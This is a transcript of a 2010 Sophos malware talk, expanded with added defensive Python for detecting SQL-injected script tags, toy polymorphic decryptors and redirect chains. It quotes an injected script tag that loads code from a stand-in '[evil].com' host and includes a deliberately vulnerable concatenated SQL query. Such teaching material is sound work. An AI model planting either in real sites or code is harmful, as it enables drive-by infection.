
Anatomy of attack – the way of malware

Anatomy of attack – the way of malware. Vanja Svajcer, Principal Researcher, Sophos. Zagreb, 12 May 2010. What do SophosLabs do? Collect threats; analyze and classify; create detection and cleanup; publish updates and information; R & D (more details later). SophosLabs at the core.



Presentation Transcript


  1. Anatomy of attack – the way of malware Vanja Svajcer, Principal Researcher – Sophos Zagreb, 12 May 2010

  2. What do SophosLabs do? • Collect threats • Analyze and classify • Create detection and cleanup • Publish updates and information • R & D • More details later

  3. SophosLabs at the core

  4. Anatomy of attack • Setting the scene • Malware • Attack techniques • Analysis process & tools • Protection technology

  5. Malware types • Virus • Trojan • Worm

  6. Who used to write viruses? No “standard” virus writer, no “standard” motivation. • Schoolkids • Undergraduates • Post-graduates • IT Professionals • Generally blokes • But not A/V companies

  7. Who writes malware today? • Rarely see viruses, but they are making a comeback • It is about money • It is criminal in its origins (there are still some spotty teenagers out there …)

  8. APT • Advanced Persistent Threat • Fashionable term for “targeted malware” • Small size (around 100k) and specialised • No packing • Looks like legitimate Windows file • Data exfiltration • Difficult to remove

  9. Email threats • The latter half of 2008 saw a dramatic rise in email attachment malware • 2009 has seen this trend continue, with several families being aggressively mass-spammed • Same old social engineering tactics • UPS/FedEx failed delivery reports, Microsoft patches, airline e-tickets etc.

  10. Top spammed malware (2009) • Dominated by key malware families • Bredo • Waled • Simple but still working!

  11. Social Engineering – Bredo Mal/Bredo • Same campaign may involve numerous “different” attachments

  12. Social Engineering – Zbot (aka Zeus) Mal/Zbot

  13. Bredo vs Zbot • Competition between the bots!!! • Bredo attempting to disable any installed Zbot • Reminiscent of the Netsky vs Bagle wars from years ago!!!

  14. Email threats • Global spam traps to track spam • USA relays more spam than any other single country • Compromised computers not only spread spam, but distribute malware and launch DDoS attacks

  15. Web predominant • 99% of infected sites are legitimate sites that have been compromised • Attack sites • Botnet C&C using HTTP • Attacks still often begin with a spammed-out email

  16. Web 2.0 Application Attacks

  17. Step 1: Redirect from compromised sites. Compromised web sites → Attacker-controlled redirects → Attack site using bundle of exploits → Payload

  18. Compromising hosts

  19. SQL injection [diagram: database servers receiving a malicious SQL injection] • Hacker uses tool to identify pages potentially vulnerable to SQL injection • Sends malicious HTTP request (Demo)

  20. SQL injection [slide shows <script src=http://[evil].com/file.js repeated many times] • SQL injection causes databases to become peppered with malicious script tags • Result is that pages on the web server built from data retrieved from the database also contain malicious script tags

  21. SQL injection • User browses site • Malicious script tag silently loads script from remote server • Victim is infected with malware: Asprox trojan

  22. Demo SQLi + XSS
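Slides 19 to 21 describe the mass SQL injection pattern: a vulnerable query lets the attacker write script tags into database content, and every page later rendered from that content carries the tag. The following added example (not from the presentation or from Sophos) shows the two defender-side pieces of that story in Python: the vulnerable string-concatenated query beside its parameterised fix, and an audit that scans stored content for script tags pointing off an allow list of script hosts. The table, rows, allow list and host names are constructed for the demonstration; the injected host is a placeholder, not a real indicator.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Constructed sample rows standing in for a site's content table. The second
# row carries an injected script tag like the ones on slide 20; the host is a
# placeholder, not a real indicator.
SAMPLE_ROWS = [
    ("Blue widget", "A sturdy blue widget."),
    ("Red widget", "Great value.<script src=http://evil-placeholder.example/file.js></script>"),
    ("Green widget", 'See <script src="/static/app.js"></script> for details.'),
]

# Hosts allowed to serve scripts into our pages ("" = relative URL on our own
# origin). Any other host in a stored script tag is suspect.
ALLOWED_SCRIPT_HOSTS = {"", "www.example.com"}

# Matches <script ... src=VALUE, with or without quotes, case-insensitively.
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.IGNORECASE)


def find_injected_script_tags(text, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return the src values of script tags in `text` whose host is off the allow list."""
    hits = []
    for src in SCRIPT_SRC_RE.findall(text):
        host = urlparse(src).netloc.lower()
        if host not in allowed_hosts:
            hits.append(src)
    return hits


def setup_db():
    """In-memory SQLite table populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, description TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def search_unsafe(conn, term):
    """The vulnerable pattern: user input concatenated into the SQL text."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term):
    """The fix: a parameterised query, so the input is always data, never SQL."""
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


def unsafe_query_breaks(conn, term):
    """True when `term` alters the SQL structure of the unsafe query. A syntax
    error from a stray quote is the same weakness an injection payload exploits."""
    try:
        search_unsafe(conn, term)
        return False
    except sqlite3.OperationalError:
        return True


def audit_table(conn):
    """Scan stored content for injected script tags: (row name, offending src)."""
    findings = []
    for name, description in conn.execute("SELECT name, description FROM products"):
        for src in find_injected_script_tags(description):
            findings.append((name, src))
    return findings


if __name__ == "__main__":
    db = setup_db()
    print("unsafe query broken by a single quote:", unsafe_query_breaks(db, "O'"))
    print("safe query with the same input:", search_safe(db, "O'"))
    for name, src in audit_table(db):
        print(f"injected script in row {name!r}: {src}")
```

The audit is a detection control, not a fix: once tags are found, the stored rows need cleaning and the injection point needs the parameterised query, otherwise the next mass-injection run simply rewrites them.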

  23. Newly infected web pages – April 2010

  24. Step 2: Further redirects. Compromised web sites → Attacker-controlled redirects → Payload

  25. SEO poisoning • Search for popular keywords

  26. Blackhat SEO

  27. Blackhat SEO

  28. Demo Blackhat SEO

  29. Visibility – sites hosting SEO kits

  30. Step 3: Load content from the attack site. Compromised web sites → Attacker-controlled redirects → Attack site using bundle of exploits → Payload

  31. Web Attacks • Built using purchased kit: MPack, IcePack, GPack, Neosploit, Eleonore, Yes • Management console • Phishing • Discovered: Oct 19th 2009 • Country hit rate: • France – 4% • US – 17% • GB – 3% • Germany – 6%

  32. Web Attacks • Per-browser breakdown! • Server-side polymorphism • Hit rate: • MSIE – 12% • FireFox – 1% • Opera – 5%

  33. Polymorphism

  34. Polymorphism

  35. Polymorphism

  36. Polymorphism

  37. Polymorphism

  38. Polymorphic malware weakness • Poly engine part of the code • Can be reversed by persistent researchers • Must be decrypted in memory • Emulate the code until the invariant is found • Detection can be based on the decryption loop
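Slide 38 states the weakness: the polymorphic engine ships with the sample, the body must be decrypted in memory, and a detector can either emulate the decryptor until the invariant body appears or match the decryption loop itself. The following added example (not from the presentation or from Sophos) illustrates both detections in Python on a toy decryptor: a made-up instruction set of XOR/ADD/SUB steps with per-variant keys, a constructed benign body, a bounded emulator that runs the loop, an invariant check on the decrypted output, and a wildcarded "loop shape" match that ignores the keys. Instruction encoding, body and keys are all constructed for the demonstration.

```python
import hashlib

# Toy decryptor "instruction set" for the demonstration: a variant starts with
# (opcode, immediate) pairs, an end marker, a 2-byte body length, then the
# encoded body. Only the immediates (keys) change between variants; the loop
# structure stays the same, which is exactly what slide 38 relies on.
OP_XOR, OP_ADD, OP_SUB, OP_END = 0x01, 0x02, 0x03, 0xFF

# Constructed benign body; the marker plays the role of the invariant a
# researcher would look for once the body has been decrypted.
BODY = b"BENIGN-TEST-BODY: hello from the lab"
INVARIANT = b"BENIGN-TEST-BODY"
KNOWN_LOOP_SHAPE = (OP_XOR, OP_ADD)  # opcode sequence of the known loop, keys wildcarded


def build_variant(body, ops):
    """Constructed test data: encode `body` so that running `ops` in order
    recovers it. Different keys give byte-different samples of one body."""
    stub = bytearray()
    for op, imm in ops:
        stub += bytes([op, imm])
    stub.append(OP_END)
    stub += len(body).to_bytes(2, "big")
    encoded = bytearray()
    for b in body:
        for op, imm in reversed(ops):  # apply the inverse steps in reverse order
            if op == OP_XOR:
                b ^= imm
            elif op == OP_ADD:
                b = (b - imm) & 0xFF
            else:
                b = (b + imm) & 0xFF
        encoded.append(b)
    return bytes(stub) + bytes(encoded)


def parse_stub(sample):
    """Recognise the decryptor loop: returns (ops, body_offset, body_len) or None."""
    ops, i = [], 0
    while i + 1 < len(sample) and sample[i] != OP_END:
        op, imm = sample[i], sample[i + 1]
        if op not in (OP_XOR, OP_ADD, OP_SUB):
            return None
        ops.append((op, imm))
        i += 2
    if not ops or i + 3 > len(sample) or sample[i] != OP_END:
        return None
    length = int.from_bytes(sample[i + 1:i + 3], "big")
    if i + 3 + length > len(sample):
        return None
    return ops, i + 3, length


def emulate(sample, max_steps=4096):
    """Run the decryption loop in a sandboxed interpreter until the body is
    decrypted. The step budget stops a hostile sample from stalling the scan."""
    parsed = parse_stub(sample)
    if parsed is None:
        return None
    ops, offset, length = parsed
    if length * len(ops) > max_steps:
        return None
    out = bytearray()
    for b in sample[offset:offset + length]:
        for op, imm in ops:
            if op == OP_XOR:
                b ^= imm
            elif op == OP_ADD:
                b = (b + imm) & 0xFF
            else:
                b = (b - imm) & 0xFF
        out.append(b)
    return bytes(out)


def detect_by_emulation(sample):
    """Detection on the invariant: emulate, then look for the known body marker."""
    body = emulate(sample)
    return body is not None and INVARIANT in body


def decryptor_shape(sample):
    """Detection on the loop itself: the opcode sequence with the keys wildcarded."""
    parsed = parse_stub(sample)
    return None if parsed is None else tuple(op for op, _ in parsed[0])


def detect_by_loop(sample):
    return decryptor_shape(sample) == KNOWN_LOOP_SHAPE


if __name__ == "__main__":
    a = build_variant(BODY, [(OP_XOR, 0x5A), (OP_ADD, 0x11)])
    b = build_variant(BODY, [(OP_XOR, 0xC3), (OP_ADD, 0x7E)])
    print("variants differ:", a != b,
          hashlib.sha256(a).hexdigest()[:8], hashlib.sha256(b).hexdigest()[:8])
    print("detected by emulation:", detect_by_emulation(a), detect_by_emulation(b))
    print("detected by loop shape:", detect_by_loop(a), detect_by_loop(b))
```

The two detections fail differently: the loop-shape match is cheap but breaks as soon as the engine reorders or pads the loop, while the emulation match survives any re-keying or restructuring of the loop but needs a step budget and a recogniser for the loop in the first place. Real engines are far harder to emulate than this toy, which is why slide 38 calls for persistent researchers.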

  39. Server side polymorphism

  40. Server side polymorphism

  41. Server side polymorphism

  42. Server side polymorphism

  43. Demo SSP

  44. Step 4: Hit the victim with exploits, infect them. Compromised web sites → Attacker-controlled redirects → Attack site using bundle of exploits → Payload
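Steps 1 to 4 describe one chain: a compromised legitimate site, one or more attacker-controlled redirects, an attack site serving a bundle of exploits, and finally the payload. From a defender's side that chain is visible in proxy logs as a referer trail that crosses several hosts and ends in an executable download. The following added example (not from the presentation or from Sophos) reconstructs such chains in Python from a constructed proxy log; the log format, field order, host names and IPs are all made up for the demonstration and the hosts are placeholders, not indicators.

```python
from urllib.parse import urlparse

# Constructed proxy log lines (not from the presentation). Fields, space separated:
# unix_time client method url status referer content_type. "-" means no referer.
LOG_LINES = """\
1273658400 10.0.0.5 GET http://news.example/story.html 200 - text/html
1273658401 10.0.0.5 GET http://redir-placeholder.example/go.php?id=7 302 http://news.example/story.html text/html
1273658402 10.0.0.5 GET http://kit-placeholder.example/index.php 200 http://redir-placeholder.example/go.php?id=7 text/html
1273658403 10.0.0.5 GET http://kit-placeholder.example/load.php?e=pdf 200 http://kit-placeholder.example/index.php application/pdf
1273658405 10.0.0.5 GET http://kit-placeholder.example/bin/update.exe 200 http://kit-placeholder.example/index.php application/octet-stream
1273658410 10.0.0.9 GET http://news.example/story.html 200 - text/html
1273658411 10.0.0.9 GET http://cdn.example/site.css 200 http://news.example/story.html text/css
"""

# Content types treated as a binary payload download in this demonstration.
PAYLOAD_TYPES = {"application/octet-stream", "application/x-msdownload"}


def parse_log(text):
    """Parse the constructed log format into a list of request dicts."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status, referer, ctype = line.split()
        entries.append({
            "ts": int(ts), "client": client, "method": method, "url": url,
            "status": int(status), "referer": None if referer == "-" else referer,
            "ctype": ctype,
        })
    return entries


def is_payload(entry):
    """A request looks like the final payload stage of the chain."""
    return (entry["ctype"] in PAYLOAD_TYPES
            or urlparse(entry["url"]).path.lower().endswith(".exe"))


def build_chain(entry, referer_index):
    """Walk referers back from a request to the page the user started on,
    stopping on a missing referer or a loop."""
    chain, seen = [entry["url"]], {entry["url"]}
    ref = entry["referer"]
    while ref is not None and ref not in seen:
        chain.append(ref)
        seen.add(ref)
        ref = referer_index.get(ref)
    chain.reverse()
    return chain


def distinct_hosts(chain):
    """Hosts in the chain, in first-seen order, without repeats."""
    hosts = []
    for url in chain:
        host = urlparse(url).netloc.lower()
        if host not in hosts:
            hosts.append(host)
    return hosts


def find_payload_chains(entries, min_hosts=3):
    """Return (client, chain) for every payload download reached through at
    least `min_hosts` distinct hosts: landing site, redirector(s), attack site."""
    by_client = {}
    for entry in entries:
        by_client.setdefault(entry["client"], []).append(entry)
    results = []
    for client, requests in by_client.items():
        # last-seen referer for each URL this client requested
        referer_index = {e["url"]: e["referer"] for e in requests}
        for entry in requests:
            if is_payload(entry):
                chain = build_chain(entry, referer_index)
                if len(distinct_hosts(chain)) >= min_hosts:
                    results.append((client, chain))
    return results


if __name__ == "__main__":
    for client, chain in find_payload_chains(parse_log(LOG_LINES)):
        print(client, " -> ".join(chain))
        print("  hosts:", distinct_hosts(chain))
```

The referer trail is the weakest link in this reconstruction: the redirect stage often strips or forges it, so in practice the chain is also stitched together by time proximity per client and by the 30x status of the hop before the attack site. The host threshold is deliberately a parameter; a chain that jumps straight from the landing page to the payload host still deserves a look, just with a noisier false-positive rate.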

  45. Video - scareware

  46. Troj/MacSwp

  47. Zeus (Zbot) • Information stealing malware and botnet building kit • Builder • Loader • Control panel
